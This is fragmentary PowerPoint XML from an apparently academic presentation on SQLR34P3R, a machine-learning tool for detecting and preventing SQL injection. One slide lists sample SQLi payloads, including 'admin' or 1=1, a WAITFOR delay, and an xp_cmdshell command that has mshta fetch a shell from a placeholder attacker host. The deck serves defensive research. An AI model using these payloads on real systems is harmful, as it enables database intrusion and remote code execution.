            <a:ext cx="3031852" cy="4041144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CVSS offers high coverage but demands significant additional effort.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EPSS provides limited coverage as low as 6.90% for authentication bypass.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Even though EE provides better coverage with 67.24% for authentication bypass, it still requires additional efforts with 6.67% for blind SQLi.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RISK R34P3R helps businesses focus on patching vulnerabilities that are actively being exploited or easily exploitable which can cause critical impact. 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CB454ED-A811-DDE3-0A18-9FAC082E5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863" y="1366910"/>
            <a:ext cx="3794245" cy="4124180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill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1F4BAF-B087-D04E-98A0-BD9E618F6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209" y="2887367"/>
            <a:ext cx="3794400" cy="26055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98E4C5-2A51-A9CC-C401-A2B828951A39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6484772" y="5491090"/>
            <a:ext cx="346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Table 14 (from Dissertation)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1536570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5B6B-0B44-CCC4-8400-29EED8C9C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146474"/>
            <a:ext cx="11029616" cy="565051"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>System Background</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3111689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EEA5F5-5866-AF10-82CE-85D1ECC37474}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650766" y="516627"/>
            <a:ext cx="11029616" cy="9146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SQLR34P3R Overview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094736-032E-554A-174A-887CBF9ECFE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="511620" y="1512408"/>
            <a:ext cx="11029615" cy="465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SQLi Attack Detection and Prevention Tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>Multiclassification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>Multisource  - PCAP and HTTP Traffic Inspection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>Risk Analysis and Threat Modelling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>Prevention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Command-line Enabled Proxy Solution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Dual Model – LSTM (HTTP Traffic Inspection) and CNN-LSTM (PCAP/Network Layer Inspection)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Developed using Python 3.11.5 stable on Visual Studio Code 1.82.</a:t>
            </a:r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737619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7C42-BD04-2A73-647B-26A6C07E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69444"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SQLR34P3R Process Flow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10F7078-126D-3460-EC7D-64E4057E1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612" y="1460500"/>
            <a:ext cx="8984777" cy="4514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789BD5-C8A2-ABDE-C6D8-32058025B819}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4361563" y="6014966"/>
            <a:ext cx="346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Figure 21 (from Dissertation)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2424435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A06B6-DFE3-A60F-25AB-17710E968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0544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SQLR34P3R Component Diagram</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="A screenshot of a diagram&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D05C1804-E814-F1E0-D156-6E5B6E089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441" y="1498600"/>
            <a:ext cx="8735119" cy="4476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B59318-4C2A-4121-AC8D-2AFE4FD1C0FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4361563" y="6014966"/>
            <a:ext cx="346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Figure 22 (from Dissertation)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2297896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5B6B-0B44-CCC4-8400-29EED8C9C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146474"/>
            <a:ext cx="11029616" cy="565051"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Background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16E2CF-95F7-E8EF-E619-16140303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2ED271-FE3F-4F86-A29A-C649AC4E9E09}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/19/2023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89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052E-B01C-A589-F5D3-9A9B3157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5944"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SQLr34p3R State Diagram</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="A diagram of a system&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5707788-5402-F9EC-4911-8FE4DF94F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776" y="1841501"/>
            <a:ext cx="11282447" cy="3803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C91D8C-8749-571D-43A6-B393E7F60781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4361562" y="5665200"/>
            <a:ext cx="346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Figure 23 (from Dissertation)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1473744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FC84-250B-4881-D831-6B2BE5EF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anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What technical challenges did you encounter and how were these overcome?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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A3CE3B3-55C7-07A8-8B9F-41066C014B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984427"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="581193" y="1890876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4192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8DAE6-069A-9116-88F3-DC6D44A9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2876"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Advantages of SQLR34P3R over State-of-the-art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6B8D8EA-3877-ADFF-766B-14B5AA57B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219" y="1155032"/>
            <a:ext cx="4178300" cy="557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532463D-4D78-F604-165C-B10DA3C93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00" y="1155032"/>
            <a:ext cx="4666923" cy="557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2974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726A-3FD0-70F3-07E9-DA536D50B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96444"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB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B0D43-4E21-8981-8E87-03D24FEE5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25600"/>
            <a:ext cx="11029615" cy="2908300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Proxy can only be hosted on Linux servers due to reliance on Linux specific commands “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mitmdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Create a correlated dataset to monitor both HTTP and network traffic rather than using dual model implementation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Perform static analysis methods such as source code analysis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Analyse HTTP responses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Increase dataset size for the limited classes. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3790213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5B6B-0B44-CCC4-8400-29EED8C9C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146474"/>
            <a:ext cx="11029616" cy="565051"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>System Demonstration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93375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CDBF-9FFA-B381-FFED-5FF53B8B7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9956"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Payloads For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FBA91-B492-8978-0204-12C731136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12112"/>
            <a:ext cx="11029615" cy="4763238"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>') WAITFOR DELAY '0:0:5’-- [11]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>admin' or 1=1 -- [12]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>' order by 5 [11]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>; EXEC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> 'mshta.exe http://&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>attacker_IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>&gt;:8000/shell.hta’-- [13]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>select tab1 from (select decode(encode(convert(compress(post) using latin1),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>post,post,post,post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>)),sha1(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>post,post,post,post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>))) as tab1 from table_1)a; [14]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3120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726A-3FD0-70F3-07E9-DA536D50B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96444"/>
          </a:xfrm>
        </p:spPr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B0D43-4E21-8981-8E87-03D24FEE5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25600"/>
            <a:ext cx="11029615" cy="4913424"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="153000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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I. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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Ilascu</a:t>
            </a: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“WooCommerce fixes vulnerability exposing 5 million sites to data theft,” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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BleepingComputer</a:t>
            </a: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Jul. 15, 2021. https://www.bleepingcomputer.com/news/security/woocommerce-fixes-vulnerability-exposing-5-million-sites-to-data-theft/ (accessed Jun. 04, 2023).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="153000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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C. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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Cimpanu</a:t>
            </a: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“Hackers use SQL injection bug in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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BillQuick</a:t>
            </a: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billing app to deploy ransomware,” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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therecord.media</a:t>
            </a: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Oct. 25, 2021. https://therecord.media/hackers-use-sql-injection-bug-in-billquick-billing-app-to-deploy-ransomware (accessed Jun. 04, 2023).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="153000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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 Sharma, “Django fixes SQL Injection vulnerability in new releases,” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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BleepingComputer</a:t>
            </a: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Jul. 04, 2022. https://www.bleepingcomputer.com/news/security/django-fixes-sql-injection-vulnerability-in-new-releases/ (accessed Jun. 04, 2023).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="153000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="565"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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Z. Hanley, “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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MOVEit</a:t>
            </a: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Transfer CVE-2023-34362 Deep Dive and Indicators of Compromise,” Horizon3.ai, Jun. 09, 2023. https://www.horizon3.ai/moveit-transfer-cve-2023-34362-deep-dive-and-indicators-of-compromise/ (accessed Jun. 04, 2023).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="153000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="565"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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B. Nagpal, N. Chauhan, and N. Singh, “A Survey on the Detection of SQL Injection Attacks and Their Countermeasures,” Journal of Information Processing Systems, vol. 13, no. 4, p. 691, Aug. 2017, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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doi</a:t>
            </a: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https://doi.org/10.3745/jips.03.0024</a:t>
            </a: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3000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="565"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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Z. S. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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Alwan</a:t>
            </a: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and M. F. Younis, “Detection and Prevention of SQL Injection Attack: A Survey,” International Journal of Computer Science and Mobile Computing, vol. 6, no. 8, pp. 5–17, Aug. 2017.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="153000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="565"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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F. Moldovan, P. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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Sătmărean</a:t>
            </a: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and C. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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Oprişa</a:t>
            </a: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“An Analysis of HTTP Attacks on Home IoT Devices,” presented at the 2020 IEEE International Conference on Automation, Quality and Testing, Robotics (AQTR), May 2020, pp. 1–6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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doi</a:t>
            </a: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https://doi.org/10.1109/AQTR49680.2020.9129980. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="153000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="565"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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M. Wang, C. Jung, A. Ahad, and Y. Kwon, “Spinner: Automated Dynamic Command Subsystem Perturbation,” presented at the CCS ’21: Proceedings of the 2021 ACM SIGSAC Conference on Computer and Communications Security, Nov. 2021, pp. 1839–1860. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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doi</a:t>
            </a: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GB" sz="1800" u="sng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https://doi.org/10.1145/3460120.3484577</a:t>
            </a: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342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="153000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="565"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB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2853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726A-3FD0-70F3-07E9-DA536D50B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96444"/>
          </a:xfrm>
        </p:spPr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B0D43-4E21-8981-8E87-03D24FEE5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25600"/>
            <a:ext cx="11029615" cy="4913424"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="153000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="9"/>
            </a:pP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I. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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Shhadat</a:t>
            </a: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B. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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Bataineh</a:t>
            </a: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A. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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Hayajneh</a:t>
            </a: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and Z. A. Al-Sharif, “The Use of Machine Learning Techniques to Advance the Detection and Classification of Unknown Malware,” Procedia Computer Science, vol. 170, pp. 917–922, 2020, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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doi</a:t>
            </a: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https://doi.org/10.1016/j.procs.2020.03.110.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="153000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="9"/>
            </a:pP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 A. Ismail and M. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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Yusoff</a:t>
            </a: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“An Efficient Hybrid LSTM-CNN and CNN-LSTM with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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GloVe</a:t>
            </a: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for Text Multi-class Sentiment Classification in Gender Violence,” International Journal of Advanced Computer Science and Applications, vol. 13, no. 9, pp. 853–863, 2022, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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doi</a:t>
            </a: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https://doi.org/10.14569/ijacsa.2022.0130999</a:t>
            </a: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342900" lvl="0" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="153000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="9"/>
            </a:pP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S. Roy, “Detecting and Defeating SQL Injection Attacks,” International Journal of Information and Electronics Engineering, vol. 1, no. 1, 2011, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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doi</a:t>
            </a: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https://doi.org/10.7763/ijiee.2011.v1.6</a:t>
            </a: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342900" lvl="0" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="153000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="9"/>
            </a:pP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Indrani </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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Balasundaram</a:t>
            </a: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and E. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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Ramaraj</a:t>
            </a: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“An Authentication Mechanism to prevent SQL Injection Attacks,” International Journal of Computer Applications, vol. 19, no. 1, pp. 30–33, Apr. 2011.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="153000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="9"/>
            </a:pP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H. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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Alnabulsi</a:t>
            </a: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R. Islam, and M. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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Talukder</a:t>
            </a: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“GMSA: Gathering Multiple Signatures Approach to Defend Against Code Injection Attacks,” IEEE Access, vol. 6, pp. 77829–77840, 2018, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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doi</a:t>
            </a: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https://doi.org/10.1109/access.2018.2884201</a:t>
            </a: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342900" lvl="0" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="153000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="9"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" kern="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</a:t>
            </a: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S. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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Alwan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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and M. F. Younis, “Detection and Prevention of SQL Injection Attack: A Survey,” International Journal of Computer Science and Mobile Computing, vol. 6, no. 8, pp. 5–17, Aug. 2017.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="153000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="9"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB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67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/>
              <a:t>SQL Injection Overview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A9B0CF-980E-DF62-6501-45F70AE35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SQL Injection continues to be a prevalent issue in web security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Successful SQLi attacks have inflicted severe damages, costing the US economy as much as $10 billion. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Three Primary Categories: Classic, Blind-based and Out-of-Band SQLi.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SQLi Compound Attacks: DNS Hijacking, DNS Exfiltration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A diagram of a web application&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A14DC372-F755-B7E0-06FF-E43E8FE66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039" y="2369214"/>
            <a:ext cx="5194769" cy="3350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54A3-30ED-53CE-DFEE-EF5C1BE36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anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SQLi Recent Attacks, Attack Vectors &amp; Impacts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A984AD6-B59F-732A-B6C7-01F5F25DAE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95546"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="581192" y="2307266"/>
          <a:ext cx="11029617" cy="317858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377900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1874772643"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1827537">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2308345012"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2188833">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1928174937"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2637947">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3967505262"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1997400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2658037868"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="437879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500" u="sng" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Platform</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="15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117" marR="88117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500" u="sng" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Category</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="15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117" marR="88117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500" u="sng" kern="100">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Attack Type</a:t>
                      </a:r>
